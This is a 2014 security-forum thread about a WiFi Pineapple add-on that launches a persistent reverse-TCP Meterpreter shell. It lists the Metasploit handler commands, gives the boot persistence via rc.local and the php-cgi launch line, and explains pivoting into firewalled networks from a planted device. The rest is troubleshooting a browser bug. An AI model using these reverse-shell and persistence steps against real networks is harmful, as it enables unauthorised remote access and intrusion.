Darren Kitchen Posted June 25, 2014 Share Posted June 25, 2014 New infusion! Meterpreter. Persistent reverse tcp for all your shell and pivoting needs. Enjoy! Meterpreter Infusion version 1.0 Host - IP or Hostname of target meterpreter listener Port - Port number of target meterpreter listener Update Meterpreter Configuration - saves Host and Port settings in /etc/config/meterpreter configuration file. Meterpreter Start - Starts a persistent meterpreter with configured settings. If connection fails a retry attempt will be made immediately. Meterpreter Stop - Kills meterpreter and prevents further instances from automatically attempting connection. Autostart Enable - Enables meterpreter on boot by adding 'pineapple infusion meterpreter&' command to /etc/rc.local Autostart Disable - Disables meterpreter on boot by removing 'pineapple infusion meterpreter&' command from /etc/rc.local Tips: While general metasploit help is outside the scope of this infusion, the following commands will typically work: use exploit/multi/handler # Handles multiple meterpreter sessions set PAYLOAD php/meterpreter/reverse_tcp # Setting for Reverse TCP Meterpreter set LHOST [host or ip] # Hostname or IP of listener set LPORT [port number] # Port of listener set ExitOnSession false # Let the exploit continue when meterpreter exists exploit -j # Make the exploit a backgroundable job sessions # Lists sessions sessions -i [number] # Interacts with session number ,__, (oo)____ (__) )\ ||--|| * Like Metasploit? Perhaps you'd enjoy Metasploit Minute with Mubix! http://www.metasploitminute.com </shameless plug> Quote Link to comment Share on other sites More sharing options...
raz0r Posted June 25, 2014 Share Posted June 25, 2014 (edited) Nice man :) I press the download nothing happenes :( Regards Raz0r Edited June 25, 2014 by raz0r Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted June 25, 2014 Share Posted June 25, 2014 Nice man :) I press the download nothing happenes :( Regards Raz0r Works fine here! Quote Link to comment Share on other sites More sharing options...
fringes Posted June 25, 2014 Share Posted June 25, 2014 (edited) I press the download nothing happenes :( Same here. It's at the bottom of the list and when I click it... nothing, no pop-up. If it helps, this is the install link and the relevant JavaScript function: http://172.16.1.10:1471/#sys/bar/preinstall/{%22id%22:%2291%22,%22name%22:%22meterpreter%22,%22version%22:%221.0%22,%22description%22:%22GUI+for+Meterpreter+reverse+TCP.+Accepts+lhost%2Flport.+Supports+start%2Fstop%2C+autostart+enable%2Fdisable.+Provides+a+persistent+remote+shell%2C+pivoting.%22,%22author%22:%22hak5darren%22,%22md5%22:%22c6c662c8ea36c4fb39bab00d2eb78c79%22,%22size%22:%224%22,%22type%22:%22inf%22,%22num_downloads%22:%223%22}/popup'>http://172.16.1.10:1471/#sys/bar/preinstall/{%22id%22:%2291%22,%22name%22:%22meterpreter%22,%22version%22:%221.0%22,%22description%22:%22GUI+for+Meterpreter+reverse+TCP.+Accepts+lhost%2Flport.+Supports+start%2Fstop%2C+autostart+enable%2Fdisable.+Provides+a+persistent+remote+shell%2C+pivoting.%22,%22author%22:%22hak5darren%22,%22md5%22:%22c6c662c8ea36c4fb39bab00d2eb78c79%22,%22size%22:%224%22,%22type%22:%22inf%22,%22num_downloads%22:%223%22}/popup or http://172.16.1.10:1471/#sys/bar/preinstall/{"id":"91","name":"meterpreter","version":"1.0","description":"GUI for Meterpreter reverse TCP. Accepts lhost/lport. Supports start/stop, autostart enable/disable. Provides a persistent remote shell, pivoting.","author":"hak5darren","md5":"c6c662c8ea36c4fb39bab00d2eb78c79","size":"4","type":"inf","num_downloads":"3"}/popup function handle_hash_change(hashValue){ //[0]:type - [1]:infusion_name - [2]:action - [3]:data - [4]:callback_function var hash_array = hashValue.replace(/#/g, '').split('/'); if(hash_array.length == 5){ //Correct size, carry on $.ajaxSetup({async:false}); if(hash_array[0] == "usr"){ $.get('/components/infusions/'+hash_array[1]+'/functions.php?'+hash_array[2]+'='+hash_array[3], function(data){ try{ window[hash_array[4]](data); }catch(err){ console.log("Function not found"); } }); }else if(hash_array[0] == "sys"){ $.get('/components/system/'+hash_array[1]+'/functions.php?'+hash_array[2]+'='+hash_array[3], function(data){ try{ window[hash_array[4]](data); }catch(err){ console.log("Function not found"); } }); } $.ajaxSetup({async:true}); } //reset url so that we can call the same link again. window.location='#'; } What appears to be happening is that "var hash_array = hashValue.replace(/#/g, '').split('/');" is resulting in an array of length 8 (instead of 5). It's splitting on the "/" characters in the description. Edited June 25, 2014 by fringes Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted June 25, 2014 Share Posted June 25, 2014 Same here. It's at the bottom of the list and when I click it... nothing, no pop-up. <snip> What appears to be happening is that "var hash_array = hashValue.replace(/#/g, '').split('/');" is resulting in an array of length 8 (instead of 5). It's splitting on the "/" characters in the description. As you can see, the first link you have posted is urlencoded. The second link you posted was the decoded version. Thing is, you did the decoding yourself - the WiFi Pineapple doesn't do that (as you can see, no url decoding done in the handle_hash_change function. It also shouldn't be the '/' character as the datalocker infusion works and also has a '/' in the description. I know that on firmware 1.4.1, the download works - I just downloaded and installed the infusion once again. Best Regards, Sebkinne Quote Link to comment Share on other sites More sharing options...
brainstorm44 Posted June 25, 2014 Share Posted June 25, 2014 i have firmware 1.4.1 and it doesn't work . all other infusions are working , but on the meterpreter nothing happens if i press install. Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted June 25, 2014 Share Posted June 25, 2014 Aaaaaaaaaaand we got to the bottom of the issue. Firefox automatically decodes window.location.hash, therefore this fails. For now, I will remove the '/' characters from the description, but we will be shipping a firmware upgrade asap. Best Regards, Sebkinne Quote Link to comment Share on other sites More sharing options...
raz0r Posted June 25, 2014 Share Posted June 25, 2014 All working now thanks chaps :) Raz0r Quote Link to comment Share on other sites More sharing options...
fringes Posted June 25, 2014 Share Posted June 25, 2014 Firefox automatically decodes window.location.hash, therefore this fails. Yes, Firefox does that. What browser do you normally recommend for the pineapple? For now, I will remove the '/' characters from the description, but we will be shipping a firmware upgrade asap. Do you really think a firmware upgrade is necessary for this, or are there other fixes you're going to incorporate? It seems to me that removing the "/" characters from all the infusion descriptions should be good enough until the next release. (I see you've already done this! Get some sleep Seb. ) Thanks for getting to this so quickly. I would have opened an issue, but I was already running late for work. PS: I just installed the Meterpreter infusion; good job. Quote Link to comment Share on other sites More sharing options...
brainstorm44 Posted June 27, 2014 Share Posted June 27, 2014 Hi . i really like metasploit , but i cant figure out ,what exactly the meterpreter infusion will do . i have kali linux on a laptop with ip 192.168.0.100 and port 4444 that is listening with the php reverse tcp payload. when i start the meterpreter infusion on mkv with the 192.168.0.100 port 4444 there is a short message with the sending stage and thats all . i dont know how to use this . where is the php payload and what should i do ? i looked in the www folder in mkv but there is nothing. thanx for helping !! Quote Link to comment Share on other sites More sharing options...
fringes Posted June 28, 2014 Share Posted June 28, 2014 I'm not really sure what your issues are, so I'll try to give you some general help. I assume you opened the infusion, clicked "Help" and followed the instructions. You should have seen Metasploit sending the stage to your pineapple's IP and then opening a Meterpreter session. If so, you've pwned your pineapple. (If Kali is running in a VM, make sure it's using bridged network mode; the pineapple must be able to connect to it.) The meterpreter.php payload was installed with the infusion and can be found in the same directory tree, but that isn't relevant. You just need to start the correct handler (listener) in Metaspoit (e.g msfconsole) in Kali, point the infusion at it and click "Start." As far as what it "will do"... Conceptually, your pineapple might be physically placed on a target network behind a firewall. So having Meterpreter running on the pineapple gives you a foothold inside that network for scanning and "pivoting" to pursue other hosts via Metasploit. Quote Link to comment Share on other sites More sharing options...
m40295 Posted July 19, 2014 Share Posted July 19, 2014 Love it great job Quote Link to comment Share on other sites More sharing options...
m40295 Posted August 20, 2014 Share Posted August 20, 2014 i have been searching, i have a idea to add to this infusion using msf rpc api technically you could set up a remote msf infusion to connect to msf thru the pineapple and controll it from a web shell/interface thought was connect to msf dropdown ip box 172.16.42.42 user pass what do you think? Quote Link to comment Share on other sites More sharing options...
phpsystems Posted August 27, 2014 Share Posted August 27, 2014 On the current firmware (2.0.3), I get an issue with the infusion. When running the steps in the executable by hand I get: X-Powered-By: PHP/5.4.5 Set-Cookie: PHPSESSID=a4f0e2c39e31a5528c27cee25cf91b6a; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <html> <head> <title>WiFi Pineapple - Login</title> <meta http-equiv="cache-control" content="max-age=0" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" /> <meta http-equiv="pragma" content="no-cache" /> <link rel="stylesheet" type="text/css" href="includes/css/styles.php" /> <script src="includes/js/jquery.min.js"></script> <noscript><meta http-equiv="refresh" content="0;url=index.php?noJS" /></noscript> <meta name="viewport" content="width=device-width, initial-scale=1.0"> </head> <body style="background-color:black; color: white;"> <center> <div style="background-color: black; position: absolute; margin: auto; top: 50%; left: 50%; width: 256px; height: 356; ; margin-top: -178px;"> <img src="/includes/img/mk5_logo.gif"><br /><br /> <form action="" method="POST"> <table> <tr><td>Username:</td><td><input type="text" name="username" value="root"></td></tr> <tr><td>Password:</td><td><input type="password" name="password"></td></tr> </table> <input type="submit" name="login" value="Log In"> </form> </div> </center> </body> </html> Modifying the executable from : php-cgi $DIR/meterpreter.php $IP $PORT > /dev/null to : cd $DIR > /dev/null php-cgi ./meterpreter.php $IP $PORT > /dev/null Seems to solve the issue. Quote Link to comment Share on other sites More sharing options...
d0n350n Posted September 24, 2014 Share Posted September 24, 2014 Works fine here! I have a question... Does your kali system have to be connected to the pineapple? Reason I ask is because, correct me if i'm wrong, but the pineapple is on the 172. network, so how would the RHOST be anything different than the 172 network? In the example above, the kali machine is on a 10. network. Does the pineapple send the shell or receive the shell? Quote Link to comment Share on other sites More sharing options...
3mrgnc3 Posted September 30, 2014 Share Posted September 30, 2014 (edited) I have a question... Does your kali system have to be connected to the pineapple? Reason I ask is because, correct me if i'm wrong, but the pineapple is on the 172. network, so how would the RHOST be anything different than the 172 network? In the example above, the kali machine is on a 10. network. Does the pineapple send the shell or receive the shell? Hi d0n350n, The pineapple has multiple ip interfaces, and can be used in a variety of different configurations. Try reading through this excellent set of guides from Scott Helme page: https://scotthelme.co.uk/wifi-pineapple-mark-v-introduction-setup/ Also, I've found the info on Cisco's site helpful in the past. http://www.cisco.com/en/US/docs/security/vpn5000/manager/reference/guide/appA.html It should help you understand the main points. Cheers. Edited September 30, 2014 by 3mrgnc3 Quote Link to comment Share on other sites More sharing options...
d0n350n Posted September 30, 2014 Share Posted September 30, 2014 Hi d0n350n, The pineapple has multiple ip interfaces, and can be used in a variety of different configurations. Try reading through this excellent set of guides from Scott Helme page: https://scotthelme.co.uk/wifi-pineapple-mark-v-introduction-setup/ Also, I've found the info on Cisco's site helpful in the past. http://www.cisco.com/en/US/docs/security/vpn5000/manager/reference/guide/appA.html It should help you understand the main points. Cheers. Thanks Bro!! I figured it out, sorta, lol, but let me ask you this? I can get a meterpreter session, but none of the commands work, not even help or shell? Quote Link to comment Share on other sites More sharing options...
3mrgnc3 Posted November 29, 2014 Share Posted November 29, 2014 (edited) ************** SOLVED *************** I'm such a massive tool and feel I need to appologise to the community for failing to RTFM!!! phpsystems +1 You had the answer right there a few lines above.... All the best 3mrgnc3 ************** SOLVED *************** I can't for the life of me seem to get this working... Can someone help me here? So, In just over a week we have a big demo and equipment test week at work. I'm trying to convince my boss to get us a load of new kit (including a box full of pineapples!) The Meterpreter infusion is pretty central to my argument for us using the Pineapple. Here are my settings... I initially set up openssl and installed my own certificates for secure https web access using firefox. Ive also reverted the nginx config back to default and tried it out using plain old http on Firefox, Icewesel, IE 11, and the latest Chrome... P.S. The Pineapple has been renamed to "RBx" in line with the project I'm using it for just incase people start to wonder Any tips? Cheers. 3mrgnc3 Edited November 29, 2014 by 3mrgnc3 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.